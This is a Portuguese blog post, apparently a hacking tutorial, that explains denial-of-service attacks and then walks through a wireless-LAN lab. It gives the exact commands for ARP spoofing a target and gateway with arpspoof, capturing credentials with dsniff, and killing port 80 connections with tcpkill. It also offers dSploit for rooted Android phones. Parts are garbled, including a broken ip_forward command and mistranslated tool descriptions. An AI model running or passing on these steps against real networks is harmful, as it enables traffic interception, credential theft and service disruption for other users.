Então Negação de Serviços é um ataque que nunca gostei, mesmo assim é um ataque interessante pois afeta a disponibilidade que é um dos três pilares da segurança da informação. Agora vamos para definição “Um ataque de negação de serviço (também conhecido como DoS Attack, um acrônimo em inglês para Denial of Service), é uma tentativa em tornar os recursos de um sistema indisponíveis para seus utilizadores. ” wiki , pois bem esse tipo de ataque geralmente é feito em servidores web para que o serviço caiam precisa de uma quantidade considera de pacotes ou requisições para o servidor web fazendo com que ele não suporte e caia, é parecido com o ENEM quando ta faltando 2 dias para terminar as inscrições , muita gente acessando o mesmo site ao mesmo tempo nessa caso os brasileiros né que tem o costume de deixar tudo para cima da hora, olha só o estrago que pode acontecer, é como fosse uma “quebra de braço”, onde quem tiver a Banda Melhor ganha.
Na imagem a cima podemos observar que um usuário normal manda apenas uma requisição enquanto o atacante manda cetenas de requisições para o servidor web, ele simula o ultimo dia para se inscrever no ENEM kkk.
E como seria um ataque desse em um ambiente local ou interno? estamos falando de uma rede wireless. vamos para nosso laboratório.
vamos utilizar a ferramenta tcpkill, o nome dela já diz né matar as conexões tcp , mas primeiro temos que habilitar o ip_forward como fizemos lá no tutorial de “capturar credenciais” quem não viu ainda voltar e ver para que serve esse comando.
#echo “1″ /proc/sys/net/ipv4/ip_forward
pronto agora podemos continuar.
vamos para o reconhecimento do lab.
então temos:
Maquina alvo: 192.168.0.100
Ip do getway(roteador): 192.168.0.1
agora vamos abrir dois terminais
root#arpspoof -i eth0 -t 192.168.0.1 192.168.0.100
root#arpspoof -i eth0 -t 192.168.0.100 192.168.0.1
arpspoof -> Serve para redirecionar pacotes a partir de um host-alvo (ou todos os hosts).
esta é uma forma extremamente eficaz de sniffing tráfego em um interruptor.
próximo passo vamos usar o dsniff
root:#dsniff -i eth0
detecta automaticamente e minimamente analisa cada
protocolo de aplicação, e só salva os interessante bits, apenas registrando
autenticação única tentativas. completa o TCP/IP remontagem é
fornecidos pela libnids.
e o final onde vamos deixar o serviço com a porta 80 inacessível.
# tcpkill -i eth0 dst 192.168.0.1 and dst port 80
, pronto afetamos uns dos pilares de segurança que é a disponibilidade
depois fazer esse tipo de ataque usando também um smartphone com sistema Android que é ainda mais legal pois é portátil e fácil manuseio
com a ferramenta DSploit entre outras, porém é preciso rootiar seu aparelho primeiramente se quiser a ferramenta para seu Android é só deixar nos cometários que coloco pra download.:@
talvez colocarei uma categoria para android se a procura pelas ferramentas for maior até uma pagina com as melhores ferramentas para pentest com android.
Creditos : Mharcos Nester.........Retirando Diretamente do site CHMOD SECURITY..:)
0 comentários:
Postar um comentário